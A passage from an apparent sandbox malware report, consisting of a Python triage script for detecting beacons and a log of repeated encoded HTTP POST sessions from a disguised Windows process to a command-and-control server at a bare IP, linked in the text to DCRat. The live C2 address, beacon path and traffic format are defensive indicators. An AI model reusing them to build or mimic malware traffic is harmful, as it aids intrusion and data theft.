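The sessions above all share one shape: a POST to a bare IP with a very long word-salad .php path, an application/octet-stream body sent after Expect: 100-continue, a fixed Chrome/Edge User-Agent, and bodies whose bytes sit in a narrow window around 0x40-0x5f instead of spreading over 0x00-0xff as compressed or encrypted data would. The script below is an added triage example, not part of the Joe Sandbox report and not DCRat code: it parses the request header block and body prefixes transcribed from sessions 10 and 11 above, reports which weak indicators each request matches, and measures how much of the body two beacons have in common, which is the first thing to check before writing a content match. The function names, indicator names and thresholds are assumptions made for the example.

```python
"""Triage of the HTTP beacons captured in the sessions above.

The request header block and the two body prefixes are transcribed from the
report (sessions 10 and 11). The function names, the indicator list and its
thresholds are assumptions made for this example; this is not Joe Sandbox,
Suricata or DCRat code.
"""
import ipaddress
import re
from typing import Dict, List, Tuple

# Request header block as captured in session 11 (first OUT record).
CAPTURED_REQUEST = (
    "POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/"
    "trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/"
    "5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/"
    "uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1\r\n"
    "Content-Type: application/octet-stream\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34\r\n"
    "Host: 185.246.67.73\r\n"
    "Content-Length: 1904\r\n"
    "Expect: 100-continue\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
)

# First 82 body bytes of the session 10 and session 11 POSTs ("Data Raw").
BODY_SESSION_10 = bytes.fromhex(
    "55 5f 43 52 5e 40 55 57 54 5e 50 59 5b 5d 59 53 59 58 59 5b 57 53 51 5f 59 58 5a 5e 51 5b"
    " 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b"
    " 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c"
)
BODY_SESSION_11 = bytes.fromhex(
    "50 5b 46 54 5e 43 55 55 54 5e 50 59 5b 50 59 5c 59 54 59 5b 57 52 51 5f 59 58 5a 5e 51 5b"
    " 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b"
    " 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c"
)


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Split an HTTP/1.x request header block into (method, path, headers).
    Header names are lower-cased so lookups are case-insensitive."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def byte_alphabet(data: bytes) -> Tuple[int, int, int]:
    """(distinct values, lowest value, highest value) of a body sample.
    Compressed or properly encrypted data spreads over 0x00-0xff; a sample
    confined to a 32-value window points at a substitution/XOR scheme."""
    return len(set(data)), min(data), max(data)


def common_suffix_len(a: bytes, b: bytes) -> int:
    """Length of the byte run shared at the end of two beacon bodies; a long
    shared run is a candidate for a content match in an IDS rule."""
    n = 0
    for x, y in zip(reversed(a), reversed(b)):
        if x != y:
            break
        n += 1
    return n


def beacon_indicators(raw: str, body: bytes) -> List[str]:
    """Names of the weak indicators a request matches. None is conclusive on
    its own; several together on one connection justify a closer look."""
    method, path, headers = parse_request(raw)
    hits: List[str] = []
    host = headers.get("host", "").split(":")[0]  # IPv4 or hostname only
    try:
        ipaddress.ip_address(host)
        hits.append("host_is_ip_literal")
    except ValueError:
        pass
    if method == "POST" and headers.get("content-type", "") == "application/octet-stream":
        hits.append("post_octet_stream")
    if headers.get("expect", "").lower() == "100-continue":
        hits.append("expect_100_continue")
    segments = [s for s in path.split("/") if s]
    if len(segments) >= 8 and segments[-1].lower().endswith(".php"):
        hits.append("long_php_path")
    # Word salad: many segments built from glued words/digits with an inner
    # capital, e.g. "trackMultiupdatePacket". The threshold of 4 is an assumption.
    if sum(1 for s in segments if re.search(r"[a-z][A-Z]", s)) >= 4:
        hits.append("camelcase_word_salad_path")
    if body:
        distinct, lo, hi = byte_alphabet(body)
        if hi - lo < 64 and distinct <= 32:
            hits.append("narrow_body_alphabet")
    return hits


if __name__ == "__main__":
    print(beacon_indicators(CAPTURED_REQUEST, BODY_SESSION_11))
    print(byte_alphabet(BODY_SESSION_11))
    print(common_suffix_len(BODY_SESSION_10, BODY_SESSION_11))
```

On the two transcribed bodies the shared run covers the last 60 of the 82 shown bytes, and only the first two dozen bytes differ between beacons; that static tail, rather than the rotating header, is what an IDS content match should key on, and the narrow byte window is why a plain XOR or shift key is worth trying before assuming real encryption.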


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49755 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe

Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 15:27:36.992156982 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
    Host: 185.246.67.73
    Content-Length: 2584
    Expect: 100-continue
    Connection: Keep-Alive
Dec 8, 2024 15:27:37.341309071 CET | 2584 | OUT | Data Raw: 50 58 46 56 5b 44 55 5f 54 5e 50 59 5b 5e 59 5b 59 5d 59 5c 57 57 51 5d 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
    Data Ascii: PXFV[DU_T^PY[^Y[Y]Y\WWQ]YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-%=-X2=Z! *.^#^9;($.('0-%(" ,8; ]!![ 8
Dec 8, 2024 15:27:38.312613964 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 8, 2024 15:27:38.552542925 CET | 207 | IN | HTTP/1.1 200 OK
    Date: Sun, 08 Dec 2024 14:27:38 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Content-Length: 4
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
    Data Raw: 34 5b 40 58
    Data Ascii: 4[@X


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49756 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe

Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 15:27:38.784037113 CET | 538 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
    Host: 185.246.67.73
    Content-Length: 2584
    Expect: 100-continue
Dec 8, 2024 15:27:39.138390064 CET | 2584 | OUT | Data Raw: 55 59 46 50 5b 48 55 5e 54 5e 50 59 5b 50 59 5b 59 5a 59 5f 57 56 51 5b 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
    Data Ascii: UYFP[HU^T^PY[PY[YZY_WVQ[YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.^3&!]!39Y,7* ;>,?$31"Y1;7,8.+ ]!![
Dec 8, 2024 15:27:40.115076065 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 8, 2024 15:27:40.348371029 CET | 151 | IN | HTTP/1.1 200 OK
    Date: Sun, 08 Dec 2024 14:27:39 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Content-Length: 4
    Content-Type: text/html; charset=UTF-8
    Data Raw: 34 5b 40 58
    Data Ascii: 4[@X


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49757 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe

Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 15:27:40.618238926 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
    Host: 185.246.67.73
    Content-Length: 2584
    Expect: 100-continue
    Connection: Keep-Alive
Dec 8, 2024 15:27:40.966372013 CET | 2584 | OUT | Data Raw: 55 5e 46 51 5b 45 55 54 54 5e 50 59 5b 5e 59 5b 59 58 59 5e 57 53 51 5f 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
    Data Ascii: U^FQ[EUTT^PY[^Y[YXY^WSQ_YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-$"&:![!#6-7:^7+6.+#3>?1!';X#<'Z, ]!![ 8
Dec 8, 2024 15:27:41.938554049 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 8, 2024 15:27:42.180918932 CET | 207 | IN | HTTP/1.1 200 OK
    Date: Sun, 08 Dec 2024 14:27:41 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Content-Length: 4
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
    Data Raw: 34 5b 40 58
    Data Ascii: 4[@X


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49758 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe

Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 15:27:42.433418036 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
    Host: 185.246.67.73
    Content-Length: 2584
    Expect: 100-continue
    Connection: Keep-Alive
Dec 8, 2024 15:27:42.778847933 CET | 2584 | OUT | Data Raw: 50 58 46 54 5e 47 50 51 54 5e 50 59 5b 5e 59 5d 59 5f 59 57 57 5d 51 57 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
    Data Ascii: PXFT^GPQT^PY[^Y]Y_YWW]QWYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-$!Y&*5[! =:*_78=;(($02#2_&+ Z(;; ]!![ 8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49759 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe

Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 15:27:43.525492907 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
    Host: 185.246.67.73
    Content-Length: 1904
    Expect: 100-continue
    Connection: Keep-Alive
Dec 8, 2024 15:27:43.872566938 CET | 1904 | OUT | Data Raw: 50 5c 46 56 5e 42 50 52 54 5e 50 59 5b 50 59 5e 59 5a 59 5e 57 55 51 5b 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
    Data Ascii: P\FV^BPRT^PY[PY^YZY^WUQ[YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.31:9[" *-*X %,%-316\%;X7,+.; ]!![
Dec 8, 2024 15:27:44.864912987 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 8, 2024 15:27:45.100759983 CET | 380 | IN | HTTP/1.1 200 OK
    Date: Sun, 08 Dec 2024 14:27:44 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Vary: Accept-Encoding
    Content-Length: 152
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
    Data Raw: 06 13 3a 0e 27 26 33 1d 2a 3a 08 59 25 12 02 00 25 38 06 04 29 30 28 04 25 39 2c 19 3b 03 33 51 23 05 2c 5e 33 03 30 1e 22 2f 24 0f 39 02 20 5a 06 10 21 5f 25 01 34 00 28 2b 3d 5e 25 5e 3e 1c 36 24 37 44 33 13 0a 0b 3d 3a 36 5b 34 2f 3c 0d 26 2e 35 11 2d 0b 2e 5d 25 56 37 57 26 0c 2c 55 0f 1f 26 50 33 0c 2f 55 34 37 26 1c 21 30 37 14 26 25 07 0e 21 3f 30 57 28 13 2c 59 2a 22 05 02 20 22 2f 13 39 2b 2d 5e 29 1c 02 09 33 06 20 53 2a 02 2e 54 0d 33 56 52
    Data Ascii: :'&3*:Y%%8)0(%9,;3Q#,^30"/$9 Z!_%4(+=^%^>6$7D3=:6[4/<&.5-.]%V7W&,U&P3/U47&!07&%!?0W(,Y*" "/9+-^)3 S*.T3VR


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49760 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe

Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 15:27:43.661802053 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
    Host: 185.246.67.73
    Content-Length: 2584
    Expect: 100-continue
    Connection: Keep-Alive
Dec 8, 2024 15:27:44.013179064 CET | 2584 | OUT | Data Raw: 55 59 43 50 5b 43 55 53 54 5e 50 59 5b 50 59 52 59 5b 59 5b 57 50 51 5f 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
    Data Ascii: UYCP[CUST^PY[PYRY[Y[WPQ_YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-35X2_9!3![-6 68+0&&+1#,;];+ ]!![
Dec 8, 2024 15:27:44.988032103 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 8, 2024 15:27:45.224329948 CET | 207 | IN | HTTP/1.1 200 OK
    Date: Sun, 08 Dec 2024 14:27:44 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Content-Length: 4
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
    Data Raw: 34 5b 40 58
    Data Ascii: 4[@X


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      18192.168.2.449761185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:27:45.455959082 CET538OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 8, 2024 15:27:45.810146093 CET2584OUTData Raw: 55 5f 46 51 5e 45 50 52 54 5e 50 59 5b 5f 59 5a 59 54 59 5c 57 5d 51 57 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: U_FQ^EPRT^PY[_YZYTY\W]QWYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.[0=6&63-%";&Z;8 3=<%#*]1: <, ]!![
Dec 8, 2024 15:27:46.871999979 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 8, 2024 15:27:47.104183912 CET | 151 | IN | HTTP/1.1 200 OK
Date: Sun, 08 Dec 2024 14:27:46 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Content-Type: text/html; charset=UTF-8
Data Raw: 34 5b 40 58
Data Ascii: 4[@X


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49762 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 15:27:47.348248005 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 185.246.67.73
Content-Length: 2584
Expect: 100-continue
Connection: Keep-Alive
Dec 8, 2024 15:27:47.700836897 CET | 2584 | OUT | Data Raw: (2584-byte encoded request body; hex/ASCII dump omitted)
Dec 8, 2024 15:27:48.672621965 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 8, 2024 15:27:48.912297010 CET | 207 | IN | HTTP/1.1 200 OK
Date: Sun, 08 Dec 2024 14:27:48 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 34 5b 40 58
Data Ascii: 4[@X


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49763 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 15:27:49.144603014 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 185.246.67.73
Content-Length: 2584
Expect: 100-continue
Connection: Keep-Alive
Dec 8, 2024 15:27:49.497684956 CET | 2584 | OUT | Data Raw: (2584-byte encoded request body; hex/ASCII dump omitted)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49764 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 15:27:50.227385044 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 185.246.67.73
Content-Length: 1904
Expect: 100-continue
Connection: Keep-Alive
Dec 8, 2024 15:27:50.576031923 CET | 1904 | OUT | Data Raw: (1904-byte encoded request body; hex/ASCII dump omitted)
Dec 8, 2024 15:27:51.552993059 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 8, 2024 15:27:51.788412094 CET | 380 | IN | HTTP/1.1 200 OK
Date: Sun, 08 Dec 2024 14:27:51 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 152
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: (152-byte encoded response body; hex/ASCII dump omitted)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49765 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 15:27:50.348189116 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 185.246.67.73
Content-Length: 2584
Expect: 100-continue
Connection: Keep-Alive
Dec 8, 2024 15:27:50.700922012 CET | 2584 | OUT | Data Raw: (2584-byte encoded request body; hex/ASCII dump omitted)
Dec 8, 2024 15:27:51.685236931 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 8, 2024 15:27:51.920366049 CET | 207 | IN | HTTP/1.1 200 OK
Date: Sun, 08 Dec 2024 14:27:51 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 34 5b 40 58
Data Ascii: 4[@X


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49766 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 15:27:52.160321951 CET | 538 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 185.246.67.73
Content-Length: 2584
Expect: 100-continue
Dec 8, 2024 15:27:52.513241053 CET | 2584 | OUT | Data Raw: (2584-byte encoded request body; hex/ASCII dump omitted)
Dec 8, 2024 15:27:53.484991074 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 8, 2024 15:27:53.720293045 CET | 151 | IN | HTTP/1.1 200 OK
Date: Sun, 08 Dec 2024 14:27:53 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Content-Type: text/html; charset=UTF-8
Data Raw: 34 5b 40 58
Data Ascii: 4[@X


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 49767 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
Timestamp | Bytes transferred | Direction | Data
